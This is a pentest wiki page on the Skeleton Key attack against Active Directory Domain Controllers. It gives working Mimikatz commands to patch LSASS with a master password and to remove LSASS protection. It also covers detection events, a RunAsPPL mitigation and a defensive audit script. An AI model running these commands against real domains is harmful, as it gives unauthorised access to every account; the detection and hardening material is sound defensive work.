Bufu-Sec Wiki
Skeleton Key

General

  • Patch the LSASS process on a Domain Controller so that it accepts a single attacker-chosen password for any user

  • Named after the Skeleton Key malware in which the technique was first discovered

  • All publicly known methods are NOT persistent across reboots

  • Mimikatz to the rescue

Exploitation

# Inject skeleton key on DC of choice with default password of 'mimikatz'. DA privileges required
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dcorp-dc.dollarcorp.moneycorp.local

# If lsass is running as a protected process we can still use Skeleton Key, but it needs the mimikatz driver (mimidrv.sys) on disk of the target DC. Very noisy!
mimikatz # privilege::debug
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # misc::skeleton
mimikatz # !-

# Access machine with any valid username and the skeleton key password
Enter-PSSession -ComputerName dcorp-dc -Credential dcorp\administrator

Detection

  • Events:

    • 7045: A service was installed in the system (Type: Kernel Mode Driver)

    • 4624: Account Logon

    • 4634: Account Logoff

    • 4672: Admin Logon

  • Events (require "Audit Privilege Use" to be enabled):

    • 4673: Sensitive Privilege Use

    • 4611: A trusted logon process has been registered with the Local Security Authority

# 7045 is written by the Service Control Manager to the System log, not the Security log
Get-WinEvent -FilterHashtable @{LogName='System';ID=7045} | ?{$_.message -like "*Kernel Mode Driver*"}

# Not recommended (detects only the stock mimidrv.sys driver name)
Get-WinEvent -FilterHashtable @{LogName='System';ID=7045} | ?{$_.message -like "*Kernel Mode Driver*" -and $_.message -like "*mimidrv*"}

Mitigation

  • Run lsass.exe as a protected process (PPL): an attacker then has to load a kernel-mode driver to patch it, which leaves a trace in the logs (Event 7045)

  • Test before implementing, as many drivers and plugins may not load with the protection

# Enable LSASS protection (takes effect after a reboot)
New-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name RunAsPPL -Value 1 -PropertyType DWord -Verbose

# Verify after reboot: Wininit logs Event 12 to the System log when lsass.exe started as a protected process
Get-WinEvent -FilterHashtable @{LogName='System';ID=12} | ?{$_.message -like "*protected process*"}
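As an added example (not from the wiki), the following PowerShell script ties the Detection and Mitigation items above together for a single DC: it reads RunAsPPL, confirms via Wininit Event 12 that LSASS actually started protected, lists kernel-mode driver installs (7045) from the System log over a lookback window, and for each one pulls the 4672/4673 Security events logged around it. The `$Days` lookback window is an assumption; run it in an elevated session on the DC.

```powershell
# Added example, not part of the Bufu-Sec wiki: audit a Domain Controller for the
# Skeleton Key mitigation state and the log traces described on this page.
# Run in an elevated PowerShell session on the DC. $Days (lookback window) is an assumption.
param([int]$Days = 7)
$since = (Get-Date).AddDays(-$Days)

# 1. Mitigation: is LSASS configured to run as a protected process (RunAsPPL = 1)?
$lsa = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$ppl = if ($null -ne $lsa.RunAsPPL) { $lsa.RunAsPPL } else { 0 }
"RunAsPPL registry value : $ppl (1 = LSASS starts as PPL on next boot)"

# 2. Verification: Wininit logs Event 12 in the System log when LSASS actually started protected
$ev12 = Get-WinEvent -FilterHashtable @{LogName='System'; ProviderName='Microsoft-Windows-Wininit'; Id=12} `
          -MaxEvents 1 -ErrorAction SilentlyContinue
$active = $ev12 -and $ev12.Message -like '*protected process*'
"LSASS protected at boot : $(if ($active) { 'YES' } else { 'NO (or not logged)' })"

# 3. Detection: with PPL on, patching LSASS needs a kernel-mode driver, which produces
#    Event 7045 (System log, Service Control Manager) with ServiceType 'kernel mode driver'.
#    Property order for 7045: 0=ServiceName 1=ImagePath 2=ServiceType 3=StartType 4=AccountName
$drivers = Get-WinEvent -FilterHashtable @{LogName='System'; Id=7045; StartTime=$since} -ErrorAction SilentlyContinue |
  Where-Object { $_.Properties[2].Value -like '*kernel mode driver*' } |
  ForEach-Object {
    [pscustomobject]@{
      Time        = $_.TimeCreated
      ServiceName = $_.Properties[0].Value
      ImagePath   = $_.Properties[1].Value
      Account     = $_.Properties[4].Value
    }
  }

if (-not $drivers) { "No kernel-mode driver installs in the last $Days days"; return }

# 4. Context: for every driver install, pull admin logons (4672) and sensitive privilege use
#    (4673, needs 'Audit Privilege Use') from the Security log within +/- 5 minutes of it.
#    Properties[1] is SubjectUserName for both event IDs.
foreach ($d in $drivers) {
  "`n[!] $($d.Time)  $($d.ServiceName) -> $($d.ImagePath)  (installed by $($d.Account))"
  Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4672,4673;
                                  StartTime=$d.Time.AddMinutes(-5); EndTime=$d.Time.AddMinutes(5)} `
               -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Id, @{n='Account'; e={$_.Properties[1].Value}} |
    Format-Table -AutoSize
}
```

A driver install on a DC that is not tied to a change record is what warrants follow-up; the surrounding 4672/4673 events show which account held the debug privilege at that moment.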